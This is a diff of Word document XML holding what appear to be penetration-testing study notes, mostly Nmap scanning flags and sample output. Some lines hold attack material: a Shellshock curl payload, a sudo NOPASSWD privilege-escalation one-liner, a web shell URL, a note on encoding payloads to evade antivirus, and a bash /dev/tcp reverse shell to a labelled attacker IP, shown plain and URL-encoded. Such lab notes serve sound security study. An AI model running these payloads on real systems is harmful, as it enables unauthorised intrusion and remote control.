-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>verbose ]</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t xml:space="preserve"> [ very verbose ]</w:t>
+      </w:r>
     </w:p>
     <w:p/>
     <w:p/>
@@ -1996,15 +1859,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">Starting Nmap 7.70 </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>( https://nmap.org</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> ) at 2022-02-05 11:46 IST</w:t>
+        <w:t>Starting Nmap 7.70 ( https://nmap.org ) at 2022-02-05 11:46 IST</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2037,15 +1892,7 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>open  http</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>-proxy</w:t>
+        <w:t xml:space="preserve"> open  http-proxy</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -2099,13 +1946,8 @@
     <w:p/>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">--reason [ reason of port/service </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>state ]</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>--reason [ reason of port/service state ]</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:r>
@@ -2146,15 +1988,7 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t>-mac-</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>prefixes :</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> Contain MAC prefix to detect manufacturer</w:t>
+        <w:t>-mac-prefixes : Contain MAC prefix to detect manufacturer</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2166,14 +2000,9 @@
       <w:r>
         <w:t>-protocols</w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:tab/>
-        <w:t xml:space="preserve">  :</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> Contain protocol and port related info</w:t>
+        <w:t xml:space="preserve">  : Contain protocol and port related info</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -2247,13 +2076,8 @@
     <w:p>
       <w:r>
         <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">2) SYN Scan: [ Half Open </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>Scan ]</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>2) SYN Scan: [ Half Open Scan ]</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:r>
@@ -2594,15 +2418,7 @@
     <w:p/>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">Type: RCE [ Remote Code </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>Execution ]</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> Remote</w:t>
+        <w:t>Type: RCE [ Remote Code Execution ] Remote</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2610,12 +2426,10 @@
         <w:t>/</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:t>cgi</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:t>-bin/status</w:t>
       </w:r>
@@ -2963,18 +2777,13 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">we took access through vulnerable web and start </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t xml:space="preserve">listening  </w:t>
+        <w:t xml:space="preserve">we took access through vulnerable web and start listening  </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:t>netcat</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:t xml:space="preserve"> on </w:t>
       </w:r>
@@ -2999,23 +2808,7 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t xml:space="preserve">curl -A '() </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>{ :</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>; }; echo; /bin/bash -c "</w:t>
+        <w:t>curl -A '() { :; }; echo; /bin/bash -c "</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -3071,13 +2864,8 @@
         <w:t>nd</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>terminal :</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t xml:space="preserve"> terminal :</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3445,15 +3233,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">2. Main </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>Components::</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>Modules</w:t>
+        <w:t>2. Main Components::Modules</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3507,15 +3287,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve"> Encoders: Encoders will allow you to encode the exploit and payload in the hope that a signature-based antivirus solution may miss them. Signature-based antivirus and security solutions have a database of known threats. They detect threats by comparing suspicious files to this database and raise an alert if there is a match. </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>Thus</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> encoders can have a limited success rate as antivirus solutions can perform additional checks.</w:t>
+        <w:t xml:space="preserve"> Encoders: Encoders will allow you to encode the exploit and payload in the hope that a signature-based antivirus solution may miss them. Signature-based antivirus and security solutions have a database of known threats. They detect threats by comparing suspicious files to this database and raise an alert if there is a match. Thus encoders can have a limited success rate as antivirus solutions can perform additional checks.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3887,15 +3659,34 @@
     <w:p/>
     <w:p/>
     <w:p>
-      <w:r>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
         <w:lastRenderedPageBreak/>
         <w:t>Privilege Escalation:</w:t>
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:t>``````````````````````</w:t>
       </w:r>
+      <w:r>
+        <w:t>```````</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:r>
@@ -3997,15 +3788,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve"># Example </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>output:#</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> User </w:t>
+        <w:t xml:space="preserve"># Example output:# User </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -4018,26 +3801,14 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">#  </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t xml:space="preserve">   </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>root) NOPASSWD: /</w:t>
+        <w:t xml:space="preserve">#     </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>(root) NOPASSWD: /</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -4064,26 +3835,14 @@
         </w:rPr>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">#  </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t xml:space="preserve">   </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>root) NOPASSWD: /</w:t>
+        <w:t xml:space="preserve">#     </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>(root) NOPASSWD: /</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -4232,7 +3991,6 @@
         <w:t xml:space="preserve">; </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:b/>
@@ -4241,13 +3999,309 @@
         <w:t>os.system</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:b/>
           <w:bCs/>
         </w:rPr>
         <w:t>("/bin/bash")'</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>192.168.46.117/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>shell.php?cmd</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>=</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Payload: bash -c 'bash -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>i</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> &gt;&amp; /dev/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>tcp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>/192.168.47.167/9090 0&gt;&amp;1'</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Attacker: 192.168.47.167</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>URL Encoding:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">+ </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>=&gt; Space</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>%20</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>=&gt; Space</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>'</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>=&gt; Single Quote</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>&gt;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:tab/>
+        <w:t xml:space="preserve">=&gt; </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>bash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.47.167%2F9090%200%3E%261%27</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -4866,7 +4920,6 @@
   <w:style w:type="character" w:default="1" w:styleId="DefaultParagraphFont">
     <w:name w:val="Default Paragraph Font"/>
     <w:uiPriority w:val="1"/>
-    <w:semiHidden/>
     <w:unhideWhenUsed/>
   </w:style>
   <w:style w:type="table" w:default="1" w:styleId="TableNormal">

--- a/1.nmap.docx
+++ b/1.nmap.docx
@@ -6,15 +6,38 @@
       <w:r>
         <w:t>+++++++++++++++++++++ACTIVE RECON+++++++++++++++++</w:t>
       </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
+      <w:r>
+        <w:t>++++++++++++++++++++++++</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
         <w:t>NMAP:</w:t>
       </w:r>
     </w:p>
     <w:p>
-      <w:r>
-        <w:t>-----</w:t>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>``````````</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -37,8 +60,13 @@
       </w:r>
       <w:r>
         <w:tab/>
-        <w:t>[ X.X.X.X ]</w:t>
-      </w:r>
+        <w:t xml:space="preserve">[ </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>X.X.X.X ]</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:r>
@@ -50,8 +78,13 @@
       </w:r>
       <w:r>
         <w:tab/>
-        <w:t>[ 80/TCP -STATE- HTTP ]</w:t>
-      </w:r>
+        <w:t xml:space="preserve">[ 80/TCP -STATE- </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>HTTP ]</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:r>
@@ -217,8 +250,21 @@
     </w:p>
     <w:p/>
     <w:p>
-      <w:r>
-        <w:t>7 : echo [ICMP/IGMP] : ping</w:t>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>7 :</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> echo [ICMP/IGMP</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>] :</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> ping</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -262,14 +308,37 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:r>
-        <w:t>SYN,ACK,RST,PSH,FIN,URG</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:r>
-        <w:t>3 way handshake</w:t>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>SYN,ACK</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>,</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>RST,PSH</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>,</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>FIN,URG</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>3 way</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> handshake</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -363,13 +432,40 @@
     </w:p>
     <w:p/>
     <w:p>
-      <w:r>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
         <w:t>[+] Hosts Discovery:</w:t>
       </w:r>
     </w:p>
     <w:p>
-      <w:r>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
         <w:t>`````````````````````</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>```````</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1094,13 +1190,40 @@
     </w:p>
     <w:p/>
     <w:p>
-      <w:r>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
         <w:t>Result:</w:t>
       </w:r>
     </w:p>
     <w:p>
-      <w:r>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
         <w:t>````````</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>``</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1116,7 +1239,15 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>MAC Address: 84:A9:3E:8A:7E:37 (Hewlett Packard)</w:t>
+        <w:t xml:space="preserve">MAC Address: </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>84:A9:3E</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>:8A:7E:37 (Hewlett Packard)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1176,12 +1307,33 @@
     <w:p/>
     <w:p>
       <w:r>
-        <w:t>1) TCP Scan: [ Full Open Scan ]</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>-------------------------------Determines a system/port being alive by completing a 3-way handshake (SYN ; SYN+ACK ; ACK)</w:t>
+        <w:t xml:space="preserve">1) TCP Scan: [ Full Open </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>Scan ]</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>-------------------------------Determines a system/port being alive by completing a 3-way handshake (</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>SYN ;</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> SYN+</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>ACK ;</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> ACK)</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -1202,14 +1354,41 @@
     </w:p>
     <w:p/>
     <w:p>
-      <w:r>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
         <w:t>+ Targets:</w:t>
       </w:r>
     </w:p>
     <w:p>
-      <w:r>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
         <w:t>```````````</w:t>
       </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>```</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:r>
@@ -1255,14 +1434,27 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:r>
-        <w:t>T  [TCP Scan]</w:t>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>T  [</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>TCP Scan]</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:r>
         <w:lastRenderedPageBreak/>
-        <w:t>NOTE: By default NMAP scan 1000 ports as result.</w:t>
+        <w:t xml:space="preserve">NOTE: By </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>default</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> NMAP scan 1000 ports as result.</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -1312,7 +1504,15 @@
     <w:p/>
     <w:p>
       <w:r>
-        <w:t>+ Port:[-p]</w:t>
+        <w:t xml:space="preserve">+ </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>Port:[</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>-p]</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1536,7 +1736,23 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t xml:space="preserve"> 192.168.206.133 -p U:53,T21-25,80</w:t>
+        <w:t xml:space="preserve"> 192.168.206.133 -p U:</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>53,T</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>21-25,80</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1776,23 +1992,43 @@
     <w:p/>
     <w:p>
       <w:r>
-        <w:t>-s [ Scan ]</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>-T [ TCP Scan ]</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>-p [ port ]</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>-v [ verbose ]</w:t>
-      </w:r>
+        <w:t xml:space="preserve">-s [ </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>Scan ]</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">-T [ TCP </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>Scan ]</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">-p [ </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>port ]</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">-v [ </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>verbose ]</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:r>
@@ -1804,14 +2040,18 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve"> [ very verbose ]</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p/>
-    <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
+        <w:t xml:space="preserve"> [ very </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>verbose ]</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+    </w:p>
+    <w:p>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:lastRenderedPageBreak/>
         <w:t>eg</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
@@ -1819,7 +2059,6 @@
         <w:t>:</w:t>
       </w:r>
     </w:p>
-    <w:p/>
     <w:p>
       <w:r>
         <w:t xml:space="preserve"># </w:t>
@@ -1859,7 +2098,15 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>Starting Nmap 7.70 ( https://nmap.org ) at 2022-02-05 11:46 IST</w:t>
+        <w:t xml:space="preserve">Starting Nmap 7.70 </w:t>
+      </w:r>
